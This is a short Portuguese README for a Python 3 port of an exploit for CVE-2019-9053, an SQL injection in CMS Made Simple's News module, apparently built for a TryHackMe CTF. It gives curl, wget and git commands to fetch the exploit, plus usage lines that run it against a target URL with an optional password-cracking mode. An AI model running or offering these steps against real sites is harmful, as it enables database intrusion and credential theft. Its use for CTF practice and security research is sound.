
CVE-2019-9053.
Este é um port para Python 3 do exploit CVE-2019-9053, que atinge versões do CMS Made Simple (CMSMS) anteriores à 2.2.10. A vulnerabilidade permite injeção SQL através do módulo News.
Testado no TryHackMe Simple CTF Challenge.

O exploit aproveita uma vulnerabilidade de injeção SQL no módulo News do CMS Made Simple. Ele pode:
Baixe e execute rapidamente usando estes comandos:
# Download the exploit
curl -O https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/exploit.py
# Download requirements
curl -O https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/requirements.txt
# Install requirements
pip install -r requirements.txt
# Make exploit executable
chmod +x exploit.py
# Run the exploit
./exploit.py -u http://target.com/cms
Alternativa usando wget:
wget https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/exploit.py
wget https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/requirements.txt
pip install -r requirements.txt
chmod +x exploit.py
./exploit.py -u http://target.com/cms
git clone https://github.com/del0x3/CVE-2019-9053-port-py3.git
cd CVE-2019-9053-port-py3
pip install -r requirements.txt
Uso básico:
python3 exploit.py -u http://target.com/cms
Com quebra de senha:
python3 exploit.py -u http://target.com/cms -c -w /path/to/wordlist.txt
-u, --url: URL base do alvo (obrigatório)-w, --wordlist: Caminho para a wordlist para quebra de senha-c, --crack: Ativar modo de quebra de senhaEsta ferramenta é apenas para fins educacionais e de pesquisa em segurança. Não a utilize contra sistemas sem permissão explícita.
Licença MIT